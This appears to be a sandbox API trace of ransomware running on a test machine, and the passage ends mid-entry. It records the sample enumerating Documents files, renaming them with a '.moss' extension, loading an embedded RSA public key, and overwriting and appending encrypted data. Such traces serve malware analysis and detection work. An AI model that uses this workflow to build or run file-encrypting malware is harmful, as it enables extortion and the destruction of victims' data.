[0169.929] CloseHandle (hObject=0x664) returned 1 [0169.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0169.932] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zt5ZyKBdOv3Ul.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zt5zykbdov3ul.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zt5ZyKBdOv3Ul.docx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zt5zykbdov3ul.docx.moss")) returned 1 [0169.934] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ea3a6c0, ftCreationTime.dwHighDateTime=0x1d5e32f, ftLastAccessTime.dwLowDateTime=0x85e6d3c0, ftLastAccessTime.dwHighDateTime=0x1d5d7b4, ftLastWriteTime.dwLowDateTime=0x85e6d3c0, ftLastWriteTime.dwHighDateTime=0x1d5d7b4, nFileSizeHigh=0x0, nFileSizeLow=0xb567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zw0x1 T.doc", cAlternateFileName="ZW0X1T~1.DOC")) returned 1 [0169.934] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.934] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.934] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.934] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zw0x1 T.doc") returned=".doc" [0169.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zw0x1 T.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw0x1 t.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.934] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=46439) returned 1 [0169.935] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.938] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xb541, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.938] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.939] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.939] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xb567, lpOverlapped=0x0) returned 1 [0169.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.939] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.940] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.940] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.940] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.940] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.940] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.940] GetLastError () returned 0x0 [0169.941] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.941] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.941] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.941] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.941] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.941] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.941] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb570) returned 0x3b62d40 [0169.941] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.941] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.941] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45db8 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc0f8 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45e00 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc110 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc140 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc158 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.942] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc140 | out: hHeap=0xcd0000) returned 1 [0169.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc158 | out: hHeap=0xcd0000) returned 1 [0169.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.942] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc158 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc140 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc158 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc140 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.943] GetCurrentThreadId () returned 0x324 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49800 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.943] GetCurrentThreadId () returned 0x324 [0169.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.943] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc140 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc158 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc128 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc170 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc140 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc140 [0169.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc140 | out: hHeap=0xcd0000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48820 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc170 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc158 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc128 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc110 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e00 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.947] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0xb562, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0xb562, lpOverlapped=0x0) returned 1 [0169.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.948] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xb567, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.948] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 